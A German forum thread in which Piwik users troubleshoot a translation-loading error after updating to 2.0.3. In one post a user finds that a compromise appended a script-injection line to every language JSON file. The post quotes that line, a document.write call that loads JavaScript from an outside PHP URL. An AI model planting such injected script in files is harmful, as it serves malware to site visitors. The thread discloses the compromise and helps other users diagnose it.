Nach Update von 2.0.2 auf 2.0.3 Fehlermeldung statt Piwik


#1

Hallo,

nach dem Update auf Version 2.0.3 lief das Programm einen Tag, wie mir schien problemfrei.

Seid gestern folgende Fehlermeldung:

There is an error. Please report the message (Piwik 2.0.3) and full backtrace in the Piwik forums (please do a Search first as it might have been reported already!).

Warning: array_replace_recursive() [function.array-replace-recursive]: Argument #2 is not an array in /kunden/xxx/xxx/xxx/piwik/core/Translate.php on line 91

Backtrace -->

#0 Piwik\Error::errorHandler(…) called at [:]
#1 array_replace_recursive(…) called at [/kunden/xxx/xxx/xxx/xxx/piwik/core/Translate.php:91]
#2 Piwik\Translate::mergeTranslationArray(…) called at [kunden/xxx/xxx/xxx/xxx/piwik/core/Translate.php:80]
#3 Piwik\Translate::loadCoreTranslationFile(…) called at [/kunden/xxx/xxx/xxx/xxx/piwik/core/Translate.php:36]
#4 Piwik\Translate::loadEnglishTranslation(…) called at [/kunden/xxx/xxx/xxx/xxx/piwik/core/FrontController.php:325]
#5 Piwik\FrontController->init(…) called at [/kunden/xxx/xxx/xxx/xxx/piwik/index.php:61]

Finde im Forum nichts vergleichbares.

Woran kann es liegen?

Hab nur ich das Problem?

Shop/Piwik ist bei domainfactory, MySQL 5.5.28

Martin


#2

Hallo Zusammen

Leider tritt bei mir genau dasselbe Problem auf. Es kam bereits gestern vor - dann habe ich V.2.0.3 nochmals neu hochgeladen, wodurch es bis heute wieder funktionierte.

Herzliche Grüsse
breezesight


#3

Hallo,

bisher war ich froh und dankbar, Piwik automisiert updaten zu können, bin da absolut kein Held und fürchte z.B. die alten Datenbanken platt zu machen. Ist dabei etwas zu beachten??

Die Fehlermeldung in meinem ersten Beitrag steht in einem rot umrandeten Kasten. Darunter erscheint noch folgender Text:

Error: General_ExceptionUnableToStartSession Please check that the web server has enough permission to write to these files/directories:
For example, on a Linux server if your Apache httpd user is www-data, you can try to execute:
chown -R www-data:www-data /kunden/xxx/xxx/xxx/xxx/piwik/tmp/sessions/
chmod -R 0755 /kunden/xxx/xxx/xxx/xxx/piwik/tmp/sessions/

If you still experience issues after trying these changes, we recommend that you enable database session storage.

Debug: the original error was
Session must be started before any output has been sent to the browser; output started in /kunden/xxx/xxx/xxx/xxx/piwik/core/Log.php/455

Ob sich mit den Zugangsrechten was geändert hat, werd ich bei df klären.


#4

Ich hatte den selben Fehler, allerdings in Piwik 2.0.1

Ich hab heraus gefunden das es an einer json datein im /lang Ordner lag. Jede json datei hatte am ende das hier stehen:


/*8989a6*/
document.write("<script src='http://komedes.at/pics/HbfB24mg.php?id=135844199' type='text/javascript'></" + "script>");
/*/8989a6*/

Ich hab es mit der Dateien auf github verglichen, wo diese Zeile nicht drin steht. Es sieht mir danach aus das Piwik irgendwo ein kleines Sicherheitsleck hat.
Die json Datein wurden laut Änderungsdatum alle am 15.01.2014 geändert.


(nfr) #5

Dies passt zu meiner Meldung, dass der Browser Chrome statt der Domain, die mit Piwik getrackt wird, eine Malware-Warnung anzeigt. Sobald der Tracking Code aus der Domain entfernt wird, verschwindet die Malware-Warnung.


#6

Danke für die Informationen!

Bei mir war es auch dieses Problem mit dem zusätzlichen Code. Ich bin mir jedoch nicht sicher, ob es ein Problem vom Piwik war oder ob schlicht die FTP-Zugangsinformationen gehackt wurden (es gab auf dem Server noch weitere Modifikationen). Von meiner Seite her ist das Problem gelöst.


#7

Hallo,

ich bin bezüglich Wordpress HTML, CSS und soweiter ein bkutiger Anfänger. Bei mir kommt ebenfalls seit längerem die Fehlermeldung:

[i]There is an error. Please report the message (Piwik 2.0.3) and full backtrace in /kunden/ …

Notice:Array to string conversion in /kunden …[/i]

Kann mir jemand genau erklären was das bedeutet und was ich machen kan oder sollte?